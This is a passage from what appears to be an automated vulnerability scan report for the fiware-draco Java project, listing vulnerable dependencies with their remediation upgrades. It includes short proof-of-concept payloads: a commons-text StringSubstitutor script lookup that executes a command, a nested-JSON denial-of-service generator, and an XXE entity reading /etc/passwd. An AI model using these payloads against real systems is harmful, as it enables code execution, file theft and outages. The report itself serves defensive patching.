  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7 org.apache.commons:commons-text@1.8
    Remediation: Upgrade to org.apache.nifi:nifi-socket-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.nifi:nifi-standard-record-utils@1.15.3 org.apache.commons:commons-text@1.8
    Remediation: Upgrade to org.apache.nifi:nifi-database-utils@1.19.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.nifi:nifi-standard-record-utils@1.15.3 org.apache.commons:commons-text@1.8
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.19.0.

Overview

Affected versions of this package are vulnerable to Arbitrary Code Execution via the StringSubstitutor interpolator object. Exploiting this vulnerability is possible when untrusted data flows into the StringSubstitutor.replace() or StringSubstitutor.replaceIn() methods.

Due to the nature of these methods as ones that process application data and not user input, a remote attacker would need prior access to a system in the affected environment positioned to supply such data.

Notes

The Nashorn scripting engine that can be used to exploit this vulnerability was available by default in JDKs up to 14.0.2. As of JDK 15, this vulnerability can only be exploited if another scripting engine has been added, such as JEXL.

Vulnerable lookups:

  1. script - executes expressions using the JVM script execution engine (javax.script)

  2. dns - resolves dns records

  3. url - loads values from urls, including from remote servers

PoC

final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
String out = interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}");
System.out.println(out);

Remediation

Upgrade org.apache.commons:commons-text to version 1.10.0 or higher.

References

high severity

Arbitrary Code Injection

  • Vulnerable module: org.apache.nifi:nifi-record-serialization-services
  • Introduced through: org.apache.nifi:nifi-record-serialization-services@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.23.0.

Overview

Affected versions of this package are vulnerable to Arbitrary Code Injection when retrieving a driver via remote URI. Permissions are not sufficiently checked when allowing users to reference remote resources.

Remediation

Upgrade org.apache.nifi:nifi-record-serialization-services to version 1.23.0 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.jackson.core:jackson-databind
  • Introduced through: org.apache.nifi:nifi-json-utils@1.15.3, org.apache.nifi:nifi-processor-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-json-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-path@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-path@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.fasterxml.jackson.dataformat:jackson-dataformat-csv@2.12.5 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.17.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-mongodb-client-service-api@1.15.3 org.apache.nifi:nifi-json-utils@1.15.3 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-hdfs-client@3.3.1 com.fasterxml.jackson.core:jackson-databind@2.12.5
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.3.

Overview

com.fasterxml.jackson.core:jackson-databind is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.

Affected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.12.6.1, 2.13.2.1 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: com.google.protobuf:protobuf-java
  • Introduced through: com.google.protobuf:protobuf-java@2.5.0 and org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.google.protobuf:protobuf-java@2.5.0
    Remediation: Upgrade to com.google.protobuf:protobuf-java@3.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.google.protobuf:protobuf-java@2.5.0
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-api@3.3.1 com.google.protobuf:protobuf-java@2.5.0
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

com.google.protobuf:protobuf-java is a Google's language-neutral, platform-neutral, extensible mechanism for serializing structured data.

Affected versions of this package are vulnerable to Denial of Service (DoS). An issue in protobuf-java allowed the interleaving of com.google.protobuf.UnknownFieldSet fields in such a way that would be processed out of order. A small malicious payload can occupy the parser for several minutes by creating large numbers of short-lived objects that cause frequent, repeated pauses.

Note: Protobuf javalite users are not affected.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.google.protobuf:protobuf-java to version 3.16.1, 3.18.2, 3.19.2 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: com.google.protobuf:protobuf-java
  • Introduced through: com.google.protobuf:protobuf-java@2.5.0 and org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.google.protobuf:protobuf-java@2.5.0
    Remediation: Upgrade to com.google.protobuf:protobuf-java@3.16.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.google.protobuf:protobuf-java@2.5.0
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-api@3.3.1 com.google.protobuf:protobuf-java@2.5.0
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

com.google.protobuf:protobuf-java is a Google's language-neutral, platform-neutral, extensible mechanism for serializing structured data.

Affected versions of this package are vulnerable to Denial of Service (DoS) in MessageReflection.java due to a text format parsing issue. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back and forth between mutable and immutable forms, resulting in potentially long garbage collection pauses.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.google.protobuf:protobuf-java to version 3.16.3, 3.19.6, 3.20.3, 3.21.7 or higher.

References

high severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: com.nimbusds:nimbus-jose-jwt
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.hadoop:hadoop-auth@3.3.1 com.nimbusds:nimbus-jose-jwt@9.8.1
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.hadoop:hadoop-auth@3.3.1 org.apache.kerby:kerb-simplekdc@1.0.1 org.apache.kerby:kerb-client@1.0.1 org.apache.kerby:token-provider@1.0.1 com.nimbusds:nimbus-jose-jwt@9.8.1
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

com.nimbusds:nimbus-jose-jwt is a library for JSON Web Tokens (JWT)

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to a large JWE p2c header value (AKA iteration count) for the PasswordBasedDecrypter (PBKDF2) class. An attacker can cause resource consumption by specifying an excessively large iteration count.

Remediation

Upgrade com.nimbusds:nimbus-jose-jwt to version 9.37.2 or higher.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: net.minidev:json-smart
  • Introduced through: org.apache.nifi:nifi-record-serialization-services@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 com.jayway.jsonpath:json-path@2.6.0 net.minidev:json-smart@2.4.7
    Remediation: Upgrade to org.apache.nifi:nifi-record-serialization-services@1.18.0.

Overview

net.minidev:json-smart is a Java JSON parser.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a StackOverflowError when parsing a deeply nested JSON array or object.

NOTE: Although this vulnerability was fixed in version 2.4.9 the maintainer recommends upgrading to 2.4.10, due to a remaining bug.

PoC

StringBuilder s = new StringBuilder();
for (int i = 0; i < 10000 ; i++) {
  s.append("{\"a\":");
}
s.append("1");
for (int i = 0; i < 10000 ; i++) {
  s.append("}");
}
JSONParser p = new JSONParser(JSONParser.MODE_JSON_SIMPLE);
p.parse(s.toString());

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade net.minidev:json-smart to version 2.4.9 or higher.

References

high severity

Arbitrary Code Execution

  • Vulnerable module: org.apache.commons:commons-configuration2
  • Introduced through: org.apache.nifi:nifi-security-utils@1.15.3, org.apache.hadoop:hadoop-client@3.3.1 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7
    Remediation: Upgrade to org.apache.nifi:nifi-security-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.commons:commons-configuration2@2.7
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7
    Remediation: Upgrade to org.apache.nifi:nifi-socket-utils@1.16.1.

Overview

org.apache.commons:commons-configuration2 is a group of tools to assist in the reading of configuration/preferences files in various formats.

Affected versions of this package are vulnerable to Arbitrary Code Execution via the Lookup functionality due to the ability to use certain insecure lookups that perform interpolation.

These lookups are:

  1. script execute expressions using the JVM script execution engine (javax.script).

  2. dns resolve DNS records.

  3. url load values from URLs, including from remote servers.

CVSS Score Explanation:

This module is designed for secure configuration management. This implies that the files it handles should have limited access, whether local or remote. Remote attacks require basic privileges and server setup for remote commands. This aligns with AC:H and PR:L

Remediation

Upgrade org.apache.commons:commons-configuration2 to version 2.8 or higher.

References

high severity

Out-of-Bounds Write

  • Vulnerable module: org.apache.commons:commons-configuration2
  • Introduced through: org.apache.nifi:nifi-security-utils@1.15.3, org.apache.hadoop:hadoop-client@3.3.1 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7
    Remediation: Upgrade to org.apache.nifi:nifi-security-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.commons:commons-configuration2@2.7
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7
    Remediation: Upgrade to org.apache.nifi:nifi-socket-utils@1.16.1.

Overview

org.apache.commons:commons-configuration2 is a group of tools to assist in the reading of configuration/preferences files in various formats.

Affected versions of this package are vulnerable to Out-of-Bounds Write due to the improper handling of a cyclical object tree when calling the ListDelimiterHandler.flatten method. An attacker can trigger a StackOverflowError and potentially cause a denial of service condition by submitting a specially crafted configuration object.

Remediation

Upgrade org.apache.commons:commons-configuration2 to version 2.10.1 or higher.

References

high severity

Out-of-Bounds Write

  • Vulnerable module: org.apache.commons:commons-configuration2
  • Introduced through: org.apache.nifi:nifi-security-utils@1.15.3, org.apache.hadoop:hadoop-client@3.3.1 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7
    Remediation: Upgrade to org.apache.nifi:nifi-security-utils@1.16.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.apache.commons:commons-configuration2@2.7
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.apache.commons:commons-configuration2@2.7
    Remediation: Upgrade to org.apache.nifi:nifi-socket-utils@1.16.1.

Overview

org.apache.commons:commons-configuration2 is a group of tools to assist in the reading of configuration/preferences files in various formats.

Affected versions of this package are vulnerable to Out-of-Bounds Write due to the improper handling of certain configurations in the AbstractListDelimiterHandler.flattenIterator method. An attacker can trigger a stack overflow by submitting a crafted configuration file or input, leading to a denial of service condition.

Remediation

Upgrade org.apache.commons:commons-configuration2 to version 2.10.1 or higher.

References

high severity

XML External Entity (XXE) Injection

  • Vulnerable module: org.codehaus.jackson:jackson-mapper-asl
  • Introduced through: org.apache.avro:avro@1.8.1, org.apache.nifi:nifi-avro-record-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.codehaus.jackson:jackson-mapper-asl@1.9.13

Overview

org.codehaus.jackson:jackson-mapper-asl is a high-performance data binding package built on Jackson JSON processor.

Affected versions of this package are vulnerable to XML External Entity (XXE) Injection. via the DOMDeserializer.class file and its inner classes (DocumentDeserializer.class and NodeDeserializer.class) that uses the _parserFactory instance without restricting it from processing external XML entities when parsing user input.

Details

XXE Injection is a type of attack against an application that parses XML input. XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.

Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.

For example, below is a sample XML document, containing an XML element- username.

<?xml version="1.0" encoding="ISO-8859-1"?>
   <username>John</username>
</xml>

An external XML entity - xxe, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of /etc/passwd and display it to the user rendered by username.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
   <username>&xxe;</username>
</xml>

Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.

Remediation

There is no fixed version for org.codehaus.jackson:jackson-mapper-asl.

For org.codehaus.jackson:jackson-all releases supporting jackson-mapper-asl. As a workaround, for 1.9.X release, the javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING setting can be enabled. For 2.x releases, the "javax.xml.stream.isSupportingExternalEntities setting can be set to FALSE.

References

high severity

Denial of Service (DoS)

  • Vulnerable module: org.eclipse.jetty:jetty-http
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1 and org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlets@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
